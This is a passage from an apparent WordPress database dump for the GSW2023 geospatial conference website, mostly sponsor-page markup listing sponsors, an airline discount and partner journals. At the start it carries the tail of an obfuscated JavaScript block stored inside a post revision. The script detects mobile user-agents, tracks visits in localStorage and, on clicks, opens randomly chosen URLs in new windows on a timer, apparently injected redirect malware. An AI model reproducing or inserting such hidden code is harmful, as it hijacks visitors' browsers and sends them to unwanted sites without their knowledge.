u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:48:52','2023-08-15 23:48:52','',3066,'https://gsw2023.com/?p=5229',0,'revision','',0),
(5230,1,'2023-08-15 23:58:51','2023-08-15 23:58:51','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][/vc_column_inner][vc_column_inner width=\"1/4\"][/vc_column_inner][vc_column_inner width=\"1/4\"][/vc_column_inner][vc_column_inner width=\"1/4\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 